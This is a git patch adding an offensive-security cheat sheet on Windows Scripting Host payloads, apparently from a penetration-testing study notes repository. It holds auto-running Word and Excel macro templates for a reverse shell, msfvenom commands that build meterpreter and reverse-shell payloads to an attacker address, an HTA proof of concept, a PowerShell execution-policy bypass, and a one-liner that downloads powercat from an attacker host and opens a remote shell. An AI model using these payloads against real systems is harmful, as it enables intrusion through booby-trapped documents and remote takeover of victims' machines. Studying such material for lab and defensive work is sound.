From c9f70905cf6ef055be3b0b798f30f4de71e5c30a Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Fri, 17 Dec 2021 01:06:21 +0100
Subject: [PATCH] payload

---
 .../payloads/windows_scripting_host.md        | 92 +++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100644 exploit/windows/payloads/windows_scripting_host.md

diff --git a/exploit/windows/payloads/windows_scripting_host.md b/exploit/windows/payloads/windows_scripting_host.md
new file mode 100644
index 0000000..7d810b9
--- /dev/null
+++ b/exploit/windows/payloads/windows_scripting_host.md
@@ -0,0 +1,92 @@
+# Windows Scripting Host (WSH)
+
+
+## Visual Basic Script (VB Script)
+* `cscript file.exe`, command line scripts
+* `wscript file.exe`, UI scripts
+
+* Example (watch out for the whitespace after path, it has to be included)
+```sh
+Set shell = WScript.CreateObject("Wscript.Shell")
+shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
+```
+```sh
+c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
+```
+
+## Visual Basic for Application (VBA)
+* Access Windows API via Macros
+* Open Word, `view` --> `macros`, give a name and select document in `Macros in`
+* Create reverse shell
+```sh
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
+```
+* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros
+```sh
+Sub Document_Open()
+  SHELL
+End Sub
+
+Sub AutoOpen()
+  SHELL
+End Sub
+
+Sub SHELL()
+    <reverse shell goes here>   
+End Sub
+```
+
+## HTML Application (HTA)
+
+* HTML file including some kind of scripting language like JS, VB, ActiveX
+* `mshta` is used to excecute
+
+### POC
+* Download file via attacker's web server
+* File should look like
+```HTML
+<html>
+  <body>
+    <script>
+	    var shell= 'cmd.exe'
+	    new ActiveXObject('WScript.Shell').Run(shell);
+    </script>
+ </body>
+</html>
+```
+* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document`
+
+
+### Reverse Shell
+* Craft reverse shell via `msfvenom`
+```sh
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta        
+```
+* `msfconsole` via
+```sh
+use exploit/windows/misc/hta_server
+```
+
+## Powershell
+
+* Powershell execution policy can be checked via
+```sh
+Get-ExecutionPolicy
+```
+* Set policy via
+```sh
+Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
+```
+* Bypass via
+```sh
+powershell -ex bypass -File shell.ps1
+```
+* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via
+```sh
+C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
+```
+* Or use msfvenom
+```sh
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
+```
+